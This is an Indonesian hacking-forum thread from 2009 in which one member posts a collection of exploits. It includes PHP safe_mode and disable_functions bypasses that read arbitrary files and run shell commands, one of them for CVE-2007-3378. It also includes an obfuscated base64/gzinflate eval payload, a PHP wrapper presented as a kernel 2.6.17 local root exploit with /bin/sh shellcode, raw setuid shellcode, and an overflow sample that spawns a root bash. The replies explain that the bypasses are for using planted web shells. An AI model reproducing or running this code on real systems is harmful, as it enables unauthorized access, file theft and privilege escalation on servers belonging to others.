We Are DevilzCrew
 
IndeksPendaftaranLogin

Share | 
 

 Aneka Exploit dan Bypass

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
mywisdom
Pengunjung
Pengunjung


Jumlah posting : 19
Join date : 24.05.09

PostSubyek: Aneka Exploit dan Bypass   Sat Jun 20, 2009 1:20 am

Bypass Safe mode

php 4.4.2-5.2.1 bypass (load file)
Code:

<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by Maksymilian Arciemowicz SecurityReason.Com
cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl
pozdro sp3x
*/


$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp



echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">SecurityReason.Com
Exploit</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. SecurityReason Team
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>

Shell command & disable function bypass (php 5.2.3):
Code:

<?php
# SecurityReason
# Coded by Maksymilian Arciemowicz
# (C) Copyright SecurityReason
#
# Advisory : http://securityreason.com/achievement_securityalert/45
# Orginal Exploit : http://securityreason.com/achievement_exploitalert/9
#
# SecurityAlert : 45
# CVE : CVE-2007-3378
# SecurityRisk : High
# Remote Exploit : No
# Local Exploit : Yes
# Affected Software : PHP 5.2.3 and prior
#
# This exploit bypass safe_mode , open_basedir and disbale functions .
# First it creates crafted .htaccess file and then all executed commands are written to result.txt file using mail(); function.
# Usage :
# ?cxib=dhr - Delete Delete .htaccess and result.txt
# ?sh=[our_command] - Execute the command
#

#variables
$htaccess="./.htaccess";
#variables


if(@mail("", "", "")==FALSE){
   die("mail() function isn't active.");
}

if(!is_writable("./")){
   die("This directory isn't writable.");
}

if($_GET['cxib']=="dhr"){
   @unlink("./.htaccess");
   @unlink("./result.txt");
}

$usun="";
if(file_exists("./result.txt") AND file_exists("./.htaccess")){
   $usun .= "<p><a href=\"http://".$_SERVER["HTTP_HOST"].
$_SERVER["SCRIPT_NAME"]."?cxib=dhr\">Delete .htaccess and result.txt</a>";
}


$htmlstart="<HTML>
<HEAD>
<TITLE>SecurityReason Exploit - PHP 5.2.3 and
prior</TITLE>
</HEAD>
<BODY>";

$formtxt="<center><h1>Security<b><font
color=RED>R</font>eason</b></h1><p>Exploit for PHP 5.2.3 and
prior</p><B><CENTER><FONT
COLOR=\"RED\">C</FONT>oded by <b>Maksymilian Arciemowicz</b>

".$usun."
<p>Form:<br>

<form action=\"http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."\"
name=\"Form\" method=\"POST\">
sh# <input type=\"text\" name=\"sh\" size=\"50\" value=\"\">
<input type=\"submit\" name=\"sent\" value=\"Exec\">
</form>
</CENTER></B>";

$htmlend="</BODY>
</HTML>";

$path=dirname($_SERVER["SCRIPT_NAME"]);

if(empty($sh)){
if(empty($_GET['sh'])){
if(empty($_POST['sh'])){

echo $htmlstart.$formtxt;

if(file_exists("./result.txt")){
   echo "<center><iframe src=\"http://".$_SERVER["HTTP_HOST"].
$path."/result.txt\" height=300 width=1000></center>";
}

echo $htmlend;

exit();
} else {
$sh=$_POST['sh'];
}
} else {
$sh=$_GET['sh'];
}
}

    if (!$handle = @fopen($htaccess, 'w')) {
        echo "Cannot create ".$htaccess."<B>check your rights to this directory.<P>. exit();";
        exit;
   }

   $syntax="php_value mail.force_extra_parameters '-t && ".$sh." > ".dirname(__FILE__)."/result.txt'";

    if (fwrite($handle, $syntax) === FALSE) {
         echo "Cannot write to file (".$htaccess.")";
        exit;
    }

if(!empty($_POST['sent'])){
   @mail("", "", "Yeah");
   sleep(2);
   header("Location: http://".$_SERVER["HTTP_HOST"].
$_SERVER["REQUEST_URI"]."?cxib=".date('s'));
   exit();
}

?>

php 5.2.9:
Code:

<? eval(gzinflate(base64_decode('
hVRNb5tAED0Hif8wXaECcQJu1BwaA1GU2E0lN7Zs
txfLQms8FijAInbt2Kny3zuA4zhW1F5gmI83b97O
ch1417rmnupaum0/xvw8w2yOJYglrPN5yZN8uhBq
lqPStVNX13QtWVqfMCvU1jLC793J1FwmKZoz2waj
svx33o6uYSoRDouGg/FHVYfuTtUIo1iA6Q1H3cAr
guH9EC6dC+cbSL7EMBMLhM8gCszDOZe4SEqYbwsu
pTcvg//PQojeUpQZ5DxDn1UmAx6pROQ+i5UqrlzX
dIxw3B397o6m7H4yGYb3RJHNnFhlqSwwSngaxbyU
1lva+Hb0YzgJH3Tt5meXzewDBBqA7H6PAEwGGapY
LHxWCKlY4CV5sVKgtgVxUbhR7JUXycFAJs9kX7YZ
rHm6ItP8gEOVahP0ezC5mmfJHo4yF1JtU3zeQ41j
8UQ1bqVAYNbC65qR4hpTv915PfAKPMRNIpW0alJX
zLZ17SR7JOH3HkqP4iNHA9Vq1VDGngD4gJsipVO0
mMvOmi2w6yRiYhmcmhvci8QqV9ZbmU3OVsv+Q60P
VmofnhqcVqqKnhyzPk6CKmnH/yjWqULNIB9FDiY6
edG1l4rzU0ytrCZyfm7DTgbHYc1MRhTTxNGqTMMk
T5TVeOtviUoUNGMUn8Htr1F/QPtDrzNoRKwfrusy
50Ci3dXoDR4mcDvoD0Y+G3XvWABetTy8RA6leJI+
+0o7E4mUrC8XbbY7X5Kmd9Mfd32/JoAbjKr29YEu
ErTMYCzKcus4DvSoJfxj22AhUOYKGpFBlLAVK3KS
K+ZrhALLLJGSbpV0zEPu4LmvVIm1W02yY1dzilIh
sSa128hr+k/9BQ==
'))); ?>




Root Exploit

kernel 2.6.17
Code:

    <?php
    /******************************
    ![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
    Script Name : *nix Kernel <=2.6.17 Sudo Root Exploit
    Author : Affix
    Website : http://iHack.co.uk
    Description :
    Once this script has been run via
    Command line type `sudo su` and
    you will log in as root without the
    root password
    [PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
    ******************************/

    $cCode = "#include <stdio.h>

    char shellcode[] =
    \"\x31\xc0\" /* xor %eax, %eax */
    \"\x50\" /* push %eax */
    \"\x68\x2f\x2f\x73\x68\" /* push $0x68732f2f */
    \"\x68\x2f\x62\x69\x6e\" /* push $0x6e69622f */
    \"\x89\xe3\" /* mov %esp,%ebx */
    \"\x50\" /* push %eax */
    \"\x53\" /* push %ebx */
    \"\x89\xe1\" /* mov %esp,%ecx */
    \"\x31\xd2\" /* xor %edx,%edx */
    \"\xb0\x0b\" /* mov $0xb,%al */
    \"\xcd\x80\"; /* int $0x80 */

    int main()
    {
    void (*fp) (void);
    fp = (void *)shellcode;
    fp();
    }";

    print "$ 0day Kernel 2.6.17 Local Root by krupt\n"
    print "$ PoC krupt <iamkrupt@gmail.com>\n"
    print "$ Exploit : Affix <affix@iHack.co.uk\n";
    print "$...\n";
    print "$ Please wait Exploit is being Executed...";

    $fh = fopen("/tmp/sploit.c", 'w') or die("can't open file");
    fwrite($fh, $cCode);
    fclose($fh);

    system("cd /tmp");
    system("cc -o sploit sploit.c");
    system("chmod 777 sploit.c");

    print "$ You may now login as root with no password."
    print "$ Execute 'sudo su' command "
    print "$ Root Shell spawning "

    system("./sploit");

    //![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
    ?>

Setuid Shellcode (trial version for kernel 2.4.x)

Code:


/*drunken sh33lc0de by mywisdom*/
#include <stdio.h>
#include <stdlib.h>
int main()
 {
 char drunk[]="/0x55/0x89/0xe5/0x83/0xec/0x28/0x83/0xec/0x08/0xff/0x75/0x08/0x8d/0x45/0xec/0x50/0xe8/0x2f/0xff/0xff/0xff/0x83/0xc4/0x10/0
xc9/0xc3/0x8d/0x4c/0x24/0x04/0x83/0xe4/0xf0/0xff/0x71/0xfc/0x55/0x89/0xe5/0x51/0x81/0xec/0x94/0x00/0x00/0x00/0xc7/0x45/0xf8/0x00/0x00/0x00/0x00/0xeb/
0
x0e/0x8b/0x45/0xf8/0xc6/0x84/0x05/0x78/0xff/0xff/0xff/0x41/0xff/0x45/0xf8/0x83/0x7d/0xf8/0x7f/0x7e/0xec/0x83/0xec/0x0c/0x8d/0x85/0x78/0xff/0xff/0xff/
0
x50/0xe8/0xa6/0xff/0xff/0xff/0x83/0xc4/0x10/0x83/0xec/0x0c/0x6a/0x00/0xe8/0xcd/0xfe/0xff/0xff/0x83/0xc4/0x10/0x83/0xec/0x0c/0x68/0x28/0x85/0x04/0x08/
0
xe8/0x9d/0xfe/0xff/0xff/0x83/0xc4/0x10/0xb8/0x00/0x00/0x00/0x00/0x8b/0x4d/0xfc/0xc9/0x8d/0x61/0xfc/0xc3/0x90/0x90/0x90/0x90/0x90";
(*(void (*)()) drunk)();
 
 }




Sample BOF dilanjut setuid:
Code:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

 void overflow_function (char *str)
{
  char buffer[20];

  strcpy(buffer, str); // Function that copies str to buffer
}

int main()
{
  char big_string[128];
  int i;

  for(i=0; i < 128; i++) // Loop 128 times
  {
      big_string[i] = 'A'; // And fill big_string with 'A's
  }
  overflow_function(big_string);
    setuid( 0 );
     
  system( "/bin/bash" );
  return 0;
  seteuid(0);
  execve("./setuid",0,0);
  return 0;
 
}


Terakhir diubah oleh mywisdom tanggal Sat Jun 20, 2009 1:56 am, total 1 kali diubah
Kembali Ke Atas Go down
vhesckot
Pengunjung
Pengunjung
avatar

Jumlah posting : 56
Join date : 03.06.09

PostSubyek: Re: Aneka Exploit dan Bypass   Sat Jun 20, 2009 1:42 am

WOW Apaan tuh kakak ???
scratch scratch scratch scratch
Saya gak ngerti,,maklum Newbie....
But,,nice share kk....
study study study study study
Kembali Ke Atas Go down
gunslinger_
Asisten LAB
Asisten LAB


Jumlah posting : 184
Join date : 15.05.09
Age : 24
Lokasi : mars

PostSubyek: Re: Aneka Exploit dan Bypass   Sat Jun 20, 2009 4:35 am

hoooooooreeeeeeeeeeeeeeeeee
cheers cheers cheers cheers
dapet koleksi bypass dari om wisdom...
cheers cheers cheers cheers
nice share om...
lol! lol! lol! lol! lol!
Kembali Ke Atas Go down
N4ck0
Pengunjung
Pengunjung
avatar

Jumlah posting : 59
Join date : 21.06.09

PostSubyek: Re: Aneka Exploit dan Bypass   Sun Jun 21, 2009 9:21 am

sebelumnya saya minta maaf nih kepada para master disini
saya hanya ingin bertanya bypass itu fungisnya untul apa yah.??
Kembali Ke Atas Go down
mywisdom
Pengunjung
Pengunjung


Jumlah posting : 19
Join date : 24.05.09

PostSubyek: Re: Aneka Exploit dan Bypass   Sun Jun 21, 2009 11:08 am

misal ente nanem shell bro yg safe modenya on , ente bisa load file dg bypass ini, and bisa jalanin shell
Kembali Ke Atas Go down
N4ck0
Pengunjung
Pengunjung
avatar

Jumlah posting : 59
Join date : 21.06.09

PostSubyek: Re: Aneka Exploit dan Bypass   Mon Jun 22, 2009 12:17 am

ouh gtu yah
okay
ilmu baru nih

thx yah
Kembali Ke Atas Go down
gunslinger_
Asisten LAB
Asisten LAB


Jumlah posting : 184
Join date : 15.05.09
Age : 24
Lokasi : mars

PostSubyek: Re: Aneka Exploit dan Bypass   Mon Jun 22, 2009 8:11 am

perhatiin safe mode nya dolo sebelum beraksi......
Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool
Kembali Ke Atas Go down
Sponsored content




PostSubyek: Re: Aneka Exploit dan Bypass   

Kembali Ke Atas Go down
 
Aneka Exploit dan Bypass
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» ----- Aneka Aksesoris KTC untuk Ninja Anda -----
» ==============================
» Accessories Kawasaki Ninja 250 by Mocca Auto Boutique
» tempat modif ninin yg bagus dan recomended seller di bandung
» ALAMAT PENJUAL BAN BATTLAX N ETC

Permissions in this forum:Anda tidak dapat menjawab topik
Devilzc0de TeaM :: Computer :: Attacking-Web-
Navigasi: